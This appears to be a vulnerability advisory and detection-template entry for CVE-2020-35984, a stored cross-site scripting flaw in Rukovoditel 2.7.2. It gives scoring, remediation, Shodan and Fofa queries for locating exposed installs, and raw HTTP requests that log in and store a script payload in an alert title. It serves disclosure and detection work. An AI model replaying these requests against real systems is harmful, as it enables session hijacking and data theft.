| Title | Rukovoditel <= 2.7.2 - Cross Site Scripting |
|---|---|
| Author | r3Y3r53 |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. |
| Remediation | Upgrade Rukovoditel to a version higher than 2.7.2 to mitigate the XSS vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.01648 |
| CVE ID | CVE-2020-35984 |
| CWE ID | CWE-79 |
| Shodan Query | http.favicon.hash:-1499940355 |
| Fofa Query | icon_hash=-1499940355 |
| Tags | cve cve2020 rukovoditel stored-xss xss authenticated vuln |
A stored cross site scripting (XSS) vulnerability in the ‘Users Alerts’ feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the ‘Title’ parameter.
GET /index.php?module=users/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10
Connection: close
Accept-Encoding: gzip
POST /index.php?module=users/login&action=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16
Connection: close
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
form_session_token=XSEslX&username=cQtph1&password=KWqBEU
POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Connection: close
Content-Length: 108
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
form_session_token=XSEslX&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35984.yaml
🦈 Packet Capture: ⬇️ Download cve-2020-35984.pcap
N/AN/A